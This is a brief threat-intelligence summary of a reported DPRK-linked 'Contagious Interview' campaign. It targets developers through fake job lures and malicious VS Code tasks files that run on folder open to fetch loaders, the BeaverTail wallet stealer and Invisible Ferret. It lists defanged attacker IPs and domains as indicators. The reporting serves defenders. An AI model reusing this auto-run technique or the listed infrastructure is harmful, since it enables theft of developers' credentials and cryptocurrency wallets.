OpenSourceMalware reports a Contagious Interview campaign linked in the text to North Korean DPRK activity that targets software engineers through recruiter and freelance-work lures, including victims connected to cryptocurrency work. Instead of the more familiar ClickFix-style lure, the infection uses malicious Visual Studio Code tasks files in cloned repositories; once the victim trusts the workspace, tasks run on folder open to fetch OS-specific loaders and establish persistence. The chain retrieves additional JavaScript and Python components, including a BeaverTail crypto stealer that targets dozens of browser wallet extensions and wallet files, then downloads Invisible Ferret from 146.70[.]41[.]188:1224. The report highlights infrastructure such as vscode-setup[.]vercel[.]app, ip-api-check-nine[.]vercel[.]app, api[.]npoint[.]io, and 146.70[.]41[.]188, and says the campaign spans multiple GitHub users, payloads, and versions, making developer workstation trust flows a key defensive concern.